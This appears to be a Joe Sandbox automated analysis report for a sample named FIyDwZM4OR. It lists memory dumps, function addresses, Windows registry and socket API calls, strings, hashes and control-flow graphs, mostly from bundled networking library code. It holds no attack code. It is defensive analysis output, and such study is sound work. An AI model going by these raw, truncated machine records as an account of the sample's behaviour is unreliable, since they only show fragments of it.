                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: b7850c1be3679f184428af409f4254bd8ffbffcf722b5e823b3c81ecedbcd94b
                                                              • Instruction ID: 27420ab0ccd1387058f96cfa254f54238aba2c0631a676be7ed9084c761691dd
                                                              • Opcode Fuzzy Hash: b7850c1be3679f184428af409f4254bd8ffbffcf722b5e823b3c81ecedbcd94b
                                                              • Instruction Fuzzy Hash: B731A5B49093059FCB10EFB8C5846AEBBF0BF54308F01896DE898A7354E7349A44CF92
                                                              Function 00F4A440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00F4AA19
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00F4AA4C
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00F4AA97
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00F4AAE9
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00F4AB30
                                                              • RegCloseKey.KERNELBASE(?), ref: 00F4AB6A
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00F4AB82
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00F4AC46
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00F4AD0A
                                                              • RegEnumKeyExA.KERNELBASE ref: 00F4AD8D
                                                              • RegCloseKey.KERNELBASE(?), ref: 00F4ADD9
                                                              • RegEnumKeyExA.KERNELBASE ref: 00F4AE08
                                                              • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00F4AE2A
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00F4AE54
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00F4AF63
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00F4AFB2
                                                              • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00F4B072
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$Open$CloseEnum
                                                              • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                              • API String ID: 4217438148-1047472027
                                                              • Opcode ID: 80e9072b6c6adcbd1ebe95dbbc2c2847754cf59e4991838ffb5e08374e10fc70
                                                              • Instruction ID: a18f7491cfde2c2b5498e1495511d5e356a32d92abdc002926fdfb4c382af549
                                                              • Opcode Fuzzy Hash: 80e9072b6c6adcbd1ebe95dbbc2c2847754cf59e4991838ffb5e08374e10fc70
                                                              • Instruction Fuzzy Hash: FA72A0B1A44301AFE320DB24CC81B6B7BE8AF95710F14492CF985DB2A1E775E944DB63
                                                              Function 00ECA550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00ECA832
                                                              Strings
                                                              • Bind to local port %d failed, trying next, xrefs: 00ECAFE5
                                                              • cf-socket.c, xrefs: 00ECA5CD, 00ECA735
                                                              • Couldn't bind to '%s' with errno %d: %s, xrefs: 00ECAE1F
                                                              • Local port: %hu, xrefs: 00ECAF28
                                                              • @, xrefs: 00ECA8F4
                                                              • Trying [%s]:%d..., xrefs: 00ECA689
                                                              • @, xrefs: 00ECAC42
                                                              • Could not set TCP_NODELAY: %s, xrefs: 00ECA871
                                                              • Trying %s:%d..., xrefs: 00ECA7C2, 00ECA7DE
                                                              • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00ECAD0A
                                                              • Name '%s' family %i resolved to '%s' family %i, xrefs: 00ECADAC
                                                              • cf_socket_open() -> %d, fd=%d, xrefs: 00ECA796
                                                              • bind failed with errno %d: %s, xrefs: 00ECB080
                                                              • Local Interface %s is ip %s using address family %i, xrefs: 00ECAE60
                                                              • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00ECA6CE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: setsockopt
                                                              • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3981526788-2373386790
                                                              • Opcode ID: b164f7d9e6304452fe17a34dd44a99805822424680ca335f33f414d5f508b031
                                                              • Instruction ID: 45ebe93394b90f1cd4927139bca04758616e39dc7dc8c738bf336a3f13b1a7ea
                                                              • Opcode Fuzzy Hash: b164f7d9e6304452fe17a34dd44a99805822424680ca335f33f414d5f508b031
                                                              • Instruction Fuzzy Hash: 63622771504345ABE7208F14C946FABB7E4FF8430CF08652DF98967292E772A846CB93
                                                              Function 00F59740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 511 f59740-f5975b 512 f59780-f59782 511->512 513 f5975d-f59768 call f578a0 511->513 515 f59914-f5994e call 1218b70 RegOpenKeyExA 512->515 516 f59788-f597a0 call 1218e00 call f578a0 512->516 520 f5976e-f59770 513->520 521 f599bb-f599c0 513->521 524 f59950-f59955 515->524 525 f5995a-f59992 RegQueryValueExA RegCloseKey call 1218b98 515->525 516->521 526 f597a6-f597c5 516->526 520->526 527 f59772-f5977e 520->527 528 f59a0c-f59a15 521->528 524->528 539 f59997-f599b5 call f578a0 525->539 534 f59827-f59833 526->534 535 f597c7-f597e0 526->535 527->516 540 f59835-f5985c call f4e2b0 * 2 534->540 541 f5985f-f59872 call f55ca0 534->541 537 f597f6-f59809 535->537 538 f597e2-f597f3 call 1218b50 535->538 537->534 550 f5980b-f59810 537->550 538->537 539->521 539->526 540->541 551 f599f0 541->551 552 f59878-f5987d call f577b0 541->552 550->534 556 f59812-f59822 550->556 555 f599f5-f599fb call f55d00 551->555 560 f59882-f59889 552->560 565 f599fe-f59a09 555->565 556->528 560->555 564 f5988f-f5989b call f44fe0 560->564 564->551 570 f598a1-f598c3 call 1218b50 call f578a0 564->570 565->528 575 f599c2-f599ed call f4e2b0 * 2 570->575 576 f598c9-f598db call f4e2d0 570->576 575->551 576->575 580 f598e1-f598f0 call f4e2d0 576->580 580->575 586 f598f6-f59905 call f563f0 580->586 591 f59f66-f59f7f call f55d00 586->591 592 f5990b-f5990f 586->592 591->565 594 f59a3f-f59a5a call f56740 call f563f0 592->594 594->591 600 f59a60-f59a6e call f56d60 594->600 603 f59a70-f59a94 call f56200 call f567e0 call f56320 600->603 604 f59a1f-f59a39 call f56840 call f563f0 600->604 615 f59a16-f59a19 603->615 616 f59a96-f59ac6 call f4d120 603->616 604->591 604->594 615->604 618 f59fc1 615->618 621 f59ae1-f59af7 call f4d190 616->621 622 f59ac8-f59adb call f4d120 616->622 620 f59fc5-f59ffd call f55d00 call f4e2b0 * 2 618->620 620->565 621->604 629 f59afd-f59b09 call f44fe0 621->629 622->604 622->621 629->618 636 f59b0f-f59b29 call f4e730 629->636 641 f59f84-f59f88 636->641 642 f59b2f-f59b3a call f578a0 636->642 643 f59f95-f59f99 641->643 642->641 648 f59b40-f59b54 call f4e760 642->648 645 f59fa0-f59fb6 call f4ebf0 * 2 643->645 646 f59f9b-f59f9e 643->646 658 f59fb7-f59fbe 645->658 646->618 646->645 654 f59f8a-f59f92 648->654 655 f59b5a-f59b6e call f4e730 648->655 654->643 661 f59b70-f5a004 655->661 662 f59b8c-f59b97 call f563f0 655->662 658->618 666 f5a015-f5a01d 661->666 670 f59b9d-f59bbf call f56740 call f563f0 662->670 671 f59c9a-f59cab call f4ea00 662->671 668 f5a024-f5a045 call f4ebf0 * 2 666->668 669 f5a01f-f5a022 666->669 668->620 669->620 669->668 670->671 688 f59bc5-f59bda call f56d60 670->688 679 f59f31-f59f35 671->679 680 f59cb1-f59ccd call f4ea00 call f4e960 671->680 682 f59f37-f59f3a 679->682 683 f59f40-f59f61 call f4ebf0 * 2 679->683 699 f59cfd-f59d0e call f4e960 680->699 700 f59ccf 680->700 682->604 682->683 683->604 688->671 698 f59be0-f59bf4 call f56200 call f567e0 688->698 698->671 719 f59bfa-f59c0b call f56320 698->719 708 f59d10 699->708 709 f59d53-f59d55 699->709 703 f59cd1-f59cec call f4e9f0 call f4e4a0 700->703 720 f59d47-f59d51 703->720 721 f59cee-f59cfb call f4e9d0 703->721 714 f59d12-f59d2d call f4e9f0 call f4e4a0 708->714 713 f59e69-f59e8e call f4ea40 call f4e440 709->713 736 f59e94-f59eaa call f4e3c0 713->736 737 f59e90-f59e92 713->737 740 f59d2f-f59d3c call f4e9d0 714->740 741 f59d5a-f59d6f call f4e960 714->741 734 f59b75-f59b86 call f4ea00 719->734 735 f59c11-f59c1c call f57b70 719->735 725 f59dca-f59ddb call f4e960 720->725 721->699 721->703 747 f59ddd-f59ddf 725->747 748 f59e2e-f59e36 725->748 734->662 758 f59f2d 734->758 735->662 752 f59c22-f59c33 call f4e960 735->752 767 f59eb0-f59eb1 736->767 768 f5a04a-f5a04c 736->768 745 f59eb3-f59ec4 call f4e9c0 737->745 740->714 760 f59d3e-f59d42 740->760 763 f59d71-f59d73 741->763 764 f59dc2 741->764 745->604 770 f59eca-f59ed0 745->770 757 f59e06-f59e21 call f4e9f0 call f4e4a0 747->757 754 f59e3d-f59e5b call f4ebf0 * 2 748->754 755 f59e38-f59e3b 748->755 778 f59c35 752->778 779 f59c66-f59c75 call f578a0 752->779 765 f59e5e-f59e67 754->765 755->754 755->765 794 f59de1-f59dee call f4ec80 757->794 795 f59e23-f59e2c call f4eac0 757->795 758->679 760->713 775 f59d9a-f59db5 call f4e9f0 call f4e4a0 763->775 764->725 765->713 765->745 767->745 773 f5a057-f5a070 call f4ebf0 * 2 768->773 774 f5a04e-f5a051 768->774 777 f59ee5-f59ef2 call f4e9f0 770->777 773->658 774->618 774->773 808 f59d75-f59d82 call f4ec80 775->808 809 f59db7-f59dc0 call f4eac0 775->809 777->604 802 f59ef8-f59f0e call f4e440 777->802 786 f59c37-f59c51 call f4e9f0 778->786 798 f5a011 779->798 799 f59c7b-f59c8f call f4e7c0 779->799 786->662 824 f59c57-f59c64 call f4e9d0 786->824 818 f59df1-f59e04 call f4e960 794->818 795->818 798->666 799->662 819 f59c95-f5a00e 799->819 822 f59f10-f59f26 call f4e3c0 802->822 823 f59ed2-f59edf call f4e9e0 802->823 829 f59d85-f59d98 call f4e960 808->829 809->829 818->748 818->757 819->798 822->823 838 f59f28 822->838 823->604 823->777 824->779 824->786 829->764 829->775 838->618
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00F59946
                                                              • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00F59974
                                                              • RegCloseKey.KERNELBASE(?), ref: 00F5998B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                              • API String ID: 3677997916-4129964100
                                                              • Opcode ID: 0fff23b801c2ed85865db9118d02de67bc73d90fa7cbe220da645995e15ead0c
                                                              • Instruction ID: a3f5fff8c5c7703d1a0a551238b011a933b4a5c246f9020de757ef4f9bbfbf58
                                                              • Opcode Fuzzy Hash: 0fff23b801c2ed85865db9118d02de67bc73d90fa7cbe220da645995e15ead0c
                                                              • Instruction Fuzzy Hash: 8C3294B5D08201ABEB11AB20EC42B1B7BE4AF54315F084434FE4997262F775E919F7A3
                                                              Function 00EC8B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1052 ec8b50-ec8b69 1053 ec8b6b-ec8b74 1052->1053 1054 ec8be6 1052->1054 1056 ec8beb-ec8bf2 1053->1056 1057 ec8b76-ec8b8d 1053->1057 1055 ec8be9 1054->1055 1055->1056 1058 ec8b8f-ec8ba7 call ea6e40 1057->1058 1059 ec8bf3-ec8bfe call eca550 1057->1059 1064 ec8bad-ec8baf 1058->1064 1065 ec8cd9-ec8d16 SleepEx 1058->1065 1066 ec8de4-ec8def 1059->1066 1067 ec8c04-ec8c08 1059->1067 1070 ec8bb5-ec8bb9 1064->1070 1071 ec8ca6-ec8cb0 1064->1071 1086 ec8d18-ec8d20 1065->1086 1087 ec8d22 1065->1087 1068 ec8e8c-ec8e95 1066->1068 1069 ec8df5-ec8e19 call eca150 1066->1069 1072 ec8dbd-ec8dc3 1067->1072 1073 ec8c0e-ec8c1d 1067->1073 1078 ec8e97-ec8e9c 1068->1078 1079 ec8f00-ec8f06 1068->1079 1108 ec8e88 1069->1108 1109 ec8e1b-ec8e26 1069->1109 1070->1056 1076 ec8bbb-ec8bc2 1070->1076 1071->1065 1074 ec8cb2-ec8cb8 1071->1074 1072->1055 1080 ec8c1f-ec8c34 connect 1073->1080 1081 ec8c35-ec8c48 call eca150 1073->1081 1082 ec8ddc-ec8dde 1074->1082 1083 ec8cbe-ec8cd4 call ecb180 1074->1083 1076->1056 1085 ec8bc4-ec8bcc 1076->1085 1088 ec8e9e-ec8eb6 call ea2a00 1078->1088 1089 ec8edf-ec8eef call e978b0 1078->1089 1079->1056 1080->1081 1107 ec8c4d-ec8c4f 1081->1107 1082->1055 1082->1066 1083->1066 1093 ec8bce-ec8bd2 1085->1093 1094 ec8bd4-ec8bda 1085->1094 1096 ec8d26-ec8d39 1086->1096 1087->1096 1088->1089 1106 ec8eb8-ec8edd call ea3410 * 2 1088->1106 1111 ec8ef2-ec8efc 1089->1111 1093->1056 1093->1094 1094->1056 1101 ec8bdc-ec8be1 1094->1101 1104 ec8d3b-ec8d3d 1096->1104 1105 ec8d43-ec8d61 call ead8c0 call eca150 1096->1105 1110 ec8dac-ec8db8 call ed50a0 1101->1110 1104->1082 1104->1105 1127 ec8d66-ec8d74 1105->1127 1106->1111 1114 ec8c8e-ec8c93 1107->1114 1115 ec8c51-ec8c58 1107->1115 1108->1068 1116 ec8e2e-ec8e85 call ead090 call ed4fd0 1109->1116 1117 ec8e28-ec8e2c 1109->1117 1110->1056 1111->1079 1125 ec8dc8-ec8dd9 call ecb100 1114->1125 1126 ec8c99-ec8c9f 1114->1126 1115->1114 1122 ec8c5a-ec8c62 1115->1122 1116->1108 1117->1108 1117->1116 1128 ec8c6a-ec8c70 1122->1128 1129 ec8c64-ec8c68 1122->1129 1125->1082 1126->1071 1127->1056 1132 ec8d7a-ec8d81 1127->1132 1128->1114 1134 ec8c72-ec8c8b call ed50a0 1128->1134 1129->1114 1129->1128 1132->1056 1137 ec8d87-ec8d8f 1132->1137 1134->1114 1141 ec8d9b-ec8da1 1137->1141 1142 ec8d91-ec8d95 1137->1142 1141->1056 1145 ec8da7 1141->1145 1142->1056 1142->1141 1145->1110
                                                              APIs
                                                              • connect.WS2_32(?,?,00000001), ref: 00EC8C2F
                                                              • SleepEx.KERNELBASE(00000000,00000000), ref: 00EC8CF3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: Sleepconnect
                                                              • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                              • API String ID: 238548546-879669977
                                                              • Opcode ID: 6a0c1ee3b4a31de04c9fd0003a03145e997b87c69dff00fb9fe8d58e9e7cd813
                                                              • Instruction ID: 2be116ce8952171053bc31e6dd6dc7d7a1e9646cb8b2da9b7c0ba61c50361d0d
                                                              • Opcode Fuzzy Hash: 6a0c1ee3b4a31de04c9fd0003a03145e997b87c69dff00fb9fe8d58e9e7cd813
                                                              • Instruction Fuzzy Hash: 5DB1E574604305AFD710CF24CB85FA6BBE4AF45318F04962DE85A6B2D2DB72EC46C762
                                                              Function 00E92F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1146 e92f17-e92f8c call 13198f0 call 1319ce0 1151 e931c9-e931cd 1146->1151 1152 e92f91-e92ff4 call e91619 RegOpenKeyExA 1151->1152 1153 e931d3-e931d6 1151->1153 1156 e92ffa-e9300b 1152->1156 1157 e931c5 1152->1157 1158 e9315c-e931ac RegEnumKeyExA 1156->1158 1157->1151 1159 e93010-e93083 call e91619 RegOpenKeyExA 1158->1159 1160 e931b2-e931c2 1158->1160 1164 e93089-e930d4 RegQueryValueExA 1159->1164 1165 e9314e-e93152 1159->1165 1160->1157 1166 e9313b-e9314b RegCloseKey 1164->1166 1167 e930d6-e93137 call 1319bc0 call 1319c50 call 1319ce0 call 1319af0 call 1319ce0 call 1318050 1164->1167 1165->1158 1166->1165 1167->1166
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1798063925.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                              • Associated: 00000000.00000002.1798049500.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798063925.0000000001569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798474818.000000000156C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.000000000156E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000016EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000017F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.0000000001803000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798490085.00000000018F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798741507.00000000018F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798928316.0000000001AAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1798944333.0000000001AAE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e90000_FIyDwZM4OR.jbxd
                                                              Similarity
                                                              • API ID: EnumOpen
                                                              • String ID: d
                                                              • API String ID: 3231578192-2564639436
                                                              • Opcode ID: ca810003a93820ffbb870b57acc7c3f858f88404431ee0165ab5aaa2c754b25c
